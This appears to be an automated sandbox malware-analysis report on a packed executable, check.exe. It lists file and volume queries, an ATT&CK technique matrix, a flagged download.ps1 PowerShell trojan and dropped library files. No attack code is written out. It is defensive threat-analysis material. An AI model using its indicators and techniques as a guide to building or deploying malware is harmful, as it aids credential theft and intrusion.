Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762\_ssl.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762\_hashlib.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762\_queue.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762\charset_normalizer VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762\charset_normalizer VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762\charset_normalizer VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762\charset_normalizer\md.cp313-win_amd64.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762\charset_normalizer VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762\charset_normalizer\md__mypyc.cp313-win_amd64.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762\unicodedata.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762\certifi VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe

Code function: 4_2_00007FF61E8ED010 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

4_2_00007FF61E8ED010

Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe

Code function: 4_2_00007FF61E905C00 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,

4_2_00007FF61E905C00

Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe

16_2_00007FFB9DD618C0

Stealing of Sensitive Information

Opens network shares

Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File opened: \\Mac\shared\projects\loader\src\dropper\src\tmp\_main.py	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File opened: \\Mac\shared\projects\loader\src\dropper\src\tmp\_main.py
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File opened: \\Mac\shared\projects\loader\src\dropper\src\tmp\_main.py

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	131 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	12 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 Windows Service	1 Access Token Manipulation	1 Obfuscated Files or Information	LSASS Memory	1 System Service Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	1 Registry Run Keys / Startup Folder	1 Windows Service	11 Software Packing	Security Account Manager	4 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 Service Execution	1 Bootkit	11 Process Injection	1 Timestomp	NTDS	47 System Information Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	1 PowerShell	Network Logon Script	1 Registry Run Keys / Startup Folder	1 DLL Side-Loading	LSA Secrets	1 Network Share Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	141 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	141 Virtualization/Sandbox Evasion	DCSync	141 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Access Token Manipulation	Proc Filesystem	2 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	11 Process Injection	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Bootkit	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
download.ps1	8%	ReversingLabs	Script-PowerShell.Trojan.Powdow

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\MSVCP140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\MSVCP140_1.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\Qt5Core.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\Qt5DBus.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\Qt5Gui.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\Qt5Network.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\Qt5Qml.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\Qt5QmlModels.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\Qt5Quick.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\Qt5Svg.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\Qt5WebSockets.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\Qt5Widgets.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\VCRUNTIME140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\VCRUNTIME140_1.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\d3dcompiler_47.dll	3%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\libEGL.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\libGLESv2.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\opengl32sw.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\generic\qtuiotouchplugin.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\iconengines\qsvgicon.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\imageformats\qgif.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\imageformats\qicns.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\imageformats\qico.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\imageformats\qjpeg.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\imageformats\qsvg.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\imageformats\qtga.dll	0%	ReversingLabs
